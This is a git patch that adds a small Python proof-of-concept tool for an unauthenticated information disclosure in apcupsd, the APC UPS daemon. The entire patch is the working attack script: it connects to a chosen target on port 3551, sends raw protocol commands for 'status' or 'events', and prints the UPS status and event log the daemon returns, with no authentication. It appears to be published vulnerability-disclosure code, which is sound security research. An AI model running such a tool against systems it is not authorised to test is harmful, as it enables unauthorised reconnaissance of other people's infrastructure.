From 00d25aece086780b090ffb584ec65027a047fd70 Mon Sep 17 00:00:00 2001
From: dash <random.mail>
Date: Thu, 13 Jun 2019 11:06:44 +0200
Subject: [PATCH] disclosure code published

---
 apcupsd_disclosure.py | 94 +++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 94 insertions(+)
 create mode 100755 apcupsd_disclosure.py

diff --git a/apcupsd_disclosure.py b/apcupsd_disclosure.py
new file mode 100755
index 0000000..be132a9
--- /dev/null
+++ b/apcupsd_disclosure.py
@@ -0,0 +1,94 @@
+#!/usr/bin/env python3
+#
+# Unauthenticated Information Disclosure in apcupsd of APC UPS
+# dash@undisclose.de
+#
+
+import os
+import sys
+import socket
+import string
+import argparse
+
+status = "\x00\x06\x73\x74\x61\x74\x75\x73".encode()
+events = "\x00\x06\x65\x76\x65\x6e\x74\x73".encode()
+protoend = "\x00\x00".encode()
+
+def socket_go(target,port,mode):
+	
+	sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+
+	try:
+		sock.connect((target,port))
+		sock.send(mode)
+	except ConnectionRefusedError as e:
+		print ("[-] Target: %s:%d - %s " % (target,port,e))
+		sys.exit(1)
+	except TimeoutError as e:
+		print ("[-] Target: %s:%d - %s " % (target,port,e))
+		sys.exit(1)
+
+	out=""
+	while [ 1 ]:
+		data = sock.recv(4096)
+		out = out + data.decode()
+		if len(data) == 0:
+			break
+		elif data.find(protoend)>0:
+			break
+	return out
+
+def parse_output(out):
+	''' basically remove non-printable protocol parts and interpret newlines ;)'''
+	output = ''.join([x for x in out if x in string.printable])
+	print(output)
+
+def run(args):
+
+	target = args.target
+	port = args.port
+	mode = args.mode
+
+	if mode == "status":
+		out=socket_go(target,port,status)
+	elif mode == "events":
+		out=socket_go(target,port,events)
+	else:
+		print("Sorry, unknown mode %s" % mode)
+		print("Supported modes:\n* status\n* events\n")
+		sys.exit(1)
+	
+	printme=parse_output(out)
+
+	print("Let's move on.")
+
+
+
+def main():
+	''' we got a main :)'''
+
+	__tool__        = 'apcupsd_disclosure.py'
+	__version__ 	= '0.1'
+	__author__      = 'dash@undisclose.de'
+	__date__        = 'June 2019'
+
+	parser_desc = 'Lil\' tool for Information Disclosure of apcupsd'
+	prog_desc = __tool__ + ' ' + __version__ + ' ' + __author__ + ' ' + __date__
+	parser = argparse.ArgumentParser(prog = prog_desc, description=parser_desc)
+
+	parser.add_argument('-m','--mode',action="store",dest='mode',required=False,help='define the mode, two modes exist: "status" and "events", default is "status"', default="status")
+	parser.add_argument('-t','--target',action="store",dest='target',required=True,help='define the target', default=False)
+	parser.add_argument('-p','--port',action="store",dest='port',required=False,help='define the target port', default=3551)
+
+	if(len(sys.argv)<2):
+		print("Sorry, to few arguments")
+		sys.exit(1)
+
+	args = parser.parse_args()
+
+	run(args)
+
+if __name__ == "__main__":
+	main()
+
+